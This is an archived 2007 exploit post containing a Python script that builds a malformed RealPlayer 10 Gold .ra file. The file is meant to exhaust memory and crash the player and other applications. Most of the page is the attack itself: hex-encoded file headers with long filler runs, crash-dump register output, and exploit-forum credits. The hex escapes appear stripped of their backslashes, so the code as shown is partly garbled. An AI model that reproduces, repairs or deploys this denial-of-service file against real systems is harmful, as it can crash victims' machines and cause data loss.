Home / os / win2k

real-dos.txt

Posted on 03 May 2007

#!/usr/bin/python ### #*Real player 10 Gold .Ra file remote Dos. #Credits to n00b for finding this bug #This bug is a nasty memory leak with in #Real player 10 gold please remember if #your guna test it out save all your info #you need first..Coz your probly guna have #to reboot also remember all other applications #will be deprived of page memory so other #applications might fail upon execution ### #Tested: On win xp sp 1 / sp 2. ################################################################################ #Pf usage will go from around 120mb-1.40gb #I've provided the following debug info also #What i could collect from the crash dump.. #No vital memory address where over written #Just a nasty memory leak. ################################################################################ #Executable search path is: #Windows XP Version 2600 (Service Pack 2) UP Free x86 compatible #Product: WinNt, suite: SingleUserTS Personal #Debug session time: Sun Apr 29 13:45:27.000 2007 (GMT-7) #System Uptime: 0 days 0:47:42.649 #Process Uptime: 0 days 0:01:39.000 ################################################################################ #This dump file has an exception of interest stored in it. #The stored exception information can be accessed via .ecxr. #(420.4a0): Access violation - code c0000005 (first/second chance not available) #eax=00000001 ebx=00000000 ecx=00000000 edx=00780764 esi=00785110 edi=6334def8 #eip=632164b5 esp=0012ddc8 ebp=0012dfdc iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 #rput3260+0x64b5: #632164b5 8b11 mov edx,dword ptr [ecx] ds:0023:00000000=???????? ################################################################################ #Seams like another memory leak in real-player 10 gold fully patched. #Im not relying on the debug-info as i had to reboot at crash time #Vist us at http://blackhat-forums.com/. ################################################################################ import sys import struct import time print"#########################################################################" print" n00b is credited for find this bug and writing poc. " print"#########################################################################" print"# Real player 10 gold .Ra file dos exploit #" print"# Shouts to every one at milw0rm #" print"# ======================= #" print"# Date :Aprill 29 2007 #" print"# #" print"# Shouts to marsu your doing a excellent job #" print"#########################################################################" print"" print"Special thanks to str0ke" print"" print"Please wait your file is being created" time.sleep (2.0) ################################################################################ Main_Header = "x2ex52x4dx46x00x00x00x12x00x01x00x00x00x00x00x00" Main_Header += "x00x06x50x52x4fx50x00x00x00x32x00x00x00x00xfax53" Main_Header += "x00x00xfax53x00x00x02xe8x00x00x02xe8x00x00x00x3c" Main_Header += "x00x00x10xe4x00x00x07x41x00x00xb3xeex00x00x02xac" Main_Header += "x00x02x00x0dx0ax4dx44x50x52x00x00x00xa4x00x00x00" Main_Header += "x00x00x00xfax53x00x00xfax53x00x00x02xe8x00x00x02" Main_Header += "xe8x00x00x00x00x00x00x07x41x00x00x15xfdx0cx41x75" Main_Header += "x64x69x6fx20x53x74x72x65x61x6dx14x61x75x64x69x6f" Main_Header += "x2fx78x2dx70x6ex2dx72x65x61x6cx61x75x64x69x6fx00" Main_Header += "x00x00x56x2ex72x61xfdx00x05x00x00x2ex72x61x35x66" Main_Header += "x05x63xd7x00x05x00x00x00x46x00x0ex00x00x02xe8x00" Main_Header += "x00xaex60x00x07x55x6dx00x00x00x00x00x14x02xe8x00" Main_Header += "xbax00x00x00x00xacx44x00x00xacx44x00x00x00x10x00" ################################################################################ Mid_Header = "x01x67x65x6ex41x41x41x41x41x41x41x41x41x41x41x41" Mid_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Mid_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Mid_Header += "x41x41x41x41x41x41x41x41x41x41x00x00x00x00x00x00" Mid_Header += "x00x62x1fxc1x42x37xc5x7fxd8xaax9bx59x89x0dx91xbb" Mid_Header += "xcdx29x32xb4xb0xd9x30x0fx05x08x5ex2bx3fx60x23x43" Mid_Header += "xe2xf3x82x96x81xfexa4x83x8ex2bx32x09x1ax21x1exc9" Mid_Header += "x8dx00x41x41x41x41x41x41x41x41x41x41x41x41x41x41" ################################################################################ Junk_Header = "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" Junk_Header += "x41x41x00x37xc5x11xf2x37xc5x11xf2x37xc5x11xf2x37" ################################################################################ Tail_Header = "xc5x49x4ex44x58x00x00x00x3ex00x00x00x00x00x03x00" Tail_Header += "x00x00x00xb4x2cx00x00x00x00x00x5cx00x00x02xbex00" Tail_Header += "x00x00x00x00x00x00x00x07x8cx00x00x3dxcex00x00x00" Tail_Header += "x14x00x00x00x00x0exbcx00x00x78xdex00x00x00x28x49" Tail_Header += "x4ex44x58x00x00x00x14x00x00x00x00x00x00x00x01x00" Tail_Header += "x00x00x00x00" n00b_file = open("Realplayerdos.ra","wb") n00b_file.write(Main_Header) time.sleep (1.0) n00b_file.write(Mid_Header) time.sleep (1.0) n00b_file.write(Junk_Header) time.sleep (1.0) n00b_file.write(Tail_Header) n00b_file.close() print"File was created."

 

TOP